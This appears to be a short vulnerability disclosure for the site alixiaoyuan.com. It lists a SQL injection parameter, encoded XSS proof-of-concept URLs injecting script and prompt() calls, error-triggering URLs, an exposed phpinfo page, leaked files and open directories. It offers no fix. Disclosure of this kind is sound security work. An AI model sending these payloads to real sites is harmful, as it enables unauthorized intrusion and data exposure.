SQL injection, cross-site scripting, and so on.

Details:

1. SQL injection
Injection URL: http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1
Injection parameter: cateID

2. Cross-site scripting (XSS)
http://wh.alixiaoyuan.com/?app=buy&city_id=%22%20onmouseover%3dprompt%28970140%29%20bad%3d%22&group_id=17
http://wh.alixiaoyuan.com/?address=%E6%B1%9F%E5%AE%81%E5%8C%BA%E5%8F%8C%E9%BE%99%E5%A4%A7%E9%81%93&app=store_map&id=62&map=118.785401,32.000455&sname=store&store_name=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28997246%29%3c%2fScRiPt%3e
http://wh.alixiaoyuan.com/index.php?act=index&app=search&keyword=1&searchBtn=1&type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973765%29%3c%2fScRiPt%3e
http://wh.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28964089%29%3c%2fScRiPt%3e

3. Sensitive information disclosure
http://www.alixiaoyuan.com/?app=buy&city_id=1‘&group_id=17
http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1%27%22
http://www.alixiaoyuan.com/?app=buy&city_id=1%27%22&group_id=17
http://www.alixiaoyuan.com/external/modules/datacall/module.info.php
……

4. phpinfo
http://www.alixiaoyuan.com/info.php

5. Source code disclosure
http://www.alixiaoyuan.com/phpmyadmin/scripts/upgrade.pl
http://www.alixiaoyuan.com/themes/mall/default/styles/default/images/member/thumbs.db
http://www.alixiaoyuan.com/themes/store/default/groupbuy.index.html

6. Directory disclosure
http://www.alixiaoyuan.com/api/
http://www.alixiaoyuan.com/data/
http://www.alixiaoyuan.com/data/files
……

Fix: =-=~